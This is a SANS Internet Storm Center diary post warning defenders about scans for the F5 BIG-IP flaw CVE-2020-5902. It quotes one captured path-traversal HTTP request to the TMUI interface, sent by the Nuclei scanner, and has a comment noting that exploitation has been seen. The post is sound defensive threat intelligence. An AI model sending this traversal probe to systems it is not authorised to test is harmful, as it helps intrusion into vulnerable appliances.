Threat Level: green Handler on Duty: Guy Bruneau

SANS ISC: CVE-2020-5902 F5 BIG-IP Exploitation Attempt SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network
https://isc.sans.edu/honeypot.html

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
CVE-2020-5902 F5 BIG-IP Exploitation Attempt

A quick heads-up: we are seeing scans for F5 BIG-IP's vulnerability CVE-2020-5902.

They look like this (Host header redacted):

GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa HTTP/1.1
Host:x.x.x.x
User-Agent: Nuclei - Open-source project (github.com/projectdiscovery/nuclei)
Accept: */*
Accept-Language: en
Connection: close
Accept-Encoding: gzip

Here is a sigma rule for CVE-2020-5902.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

DidierStevens

492 Posts
ISC Handler
Jul 5th 2020
We've already seen exploitation since Friday - https://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/
Anonymous

Sign Up for Free or Log In to start participating in the conversation!